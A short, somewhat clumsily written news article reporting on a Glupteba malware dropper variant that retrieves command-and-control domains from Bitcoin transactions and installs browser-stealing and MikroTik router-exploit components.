With the advancement of technology in the modern era, there has also grown a notorious community, which works tirelessly to compromise with the codes and database to extract crucial information, including access to asset accounts.
Cryptocurrencies work thoroughly on the decentralized network and rely completely on the blockchain and smart contracts for executing transactions. Hackers and programers try to sneak into the blockchain platform to execute their malicious actions.
Recently, the digital currency sphere was taken by a blow when it was found that a new version of Glupteba malware dropper is operating on the Bitcoin blockchain to exploit command and control server domains from Bitcoin trades marked with OP_RETURN script opcodes.
First discovered in 2011, Glupteba is a malware which fosters hijacking of a computer system to steal data or render to the denial of service attacks. It has been earlier injected into the systems as a secondary payload by the Alureon Trojan. It was a part of a program formulated to boost Clickjacking contextual advertising.
Also, the malware found its presence in ‘Operation Windigo’ where Windows computers were being attacked by the programmers.
Now, it is discovered that Glupteba dropper and a backdoor Trojan is keeping track of Bitcoin transactions. The dropper attaches extra tow components to the victim’s computer- browser stealer and router exploit.
With the help of browsers namely Chrome, Opera, and Yandex, the browser stealer component accesses the browsing history of the crypto owner along with cookies, account names and passwords as well. Meanwhile, the router exploit brings MikroTik RouterOS feature into use. The vulnerability allows the penetrators to create arbitrary files. It facilitates the attackers in hiding their correct IP address by configuring the router as SOCKS proxy.
The C&C updating attribute of Glupteba is a feature to ponder upon. With the help of the discover Domain operation, the malware attacks the Electrum Bitcoin wallet servers using a public-open list. The hard-coded hash allows the scammers to track down the history of the blockchains hash script, which easily puts the history of the related transactions to exposure.
A malvertising campaign which was centered around file-sharing websites was used to implant the latest version of Glupteba. In any case, if the attacker loses the hold of the C&C server, a new Bitcoin script is added to the infected system. This will give a new server formed by decryption of script data and reconnection of it to the attacked system.